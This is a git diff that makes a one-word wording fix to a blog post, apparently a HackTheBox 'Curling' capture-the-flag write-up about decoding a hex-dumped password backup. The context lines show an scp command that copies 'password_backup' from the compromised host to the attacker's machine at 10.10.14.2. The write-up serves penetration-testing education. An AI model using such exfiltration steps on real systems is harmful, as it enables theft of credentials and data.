--- a/_posts/2018-12-22-Curling.md
+++ b/_posts/2018-12-22-Curling.md
@@ -185,7 +185,7 @@ Before working with this file further, it was transferred to the attacking syste
 www-data@curling:/home/floris$ scp ./password_backup root@10.10.14.2:/root/workspace/hackthebox/Curling/
 ```
 
-From `xxd -h`, the `-r` flag can be used to reverse an operation. Running the `xxd -r password_backup > output` creates the `output` file that contains the reuslt of the `xxd -r` command. The `file` tool was used to determine what kind of data is within the file.
+From `xxd -h`, the `-r` flag can be used to reverse an operation. Running the `xxd -r password_backup > output` command creates the `output` file that contains the reuslt of the `xxd -r` command. The `file` tool was used to determine what kind of data is within the file.
 
 ```
 root@kali:~/workspace/hackthebox/Curling# file output 
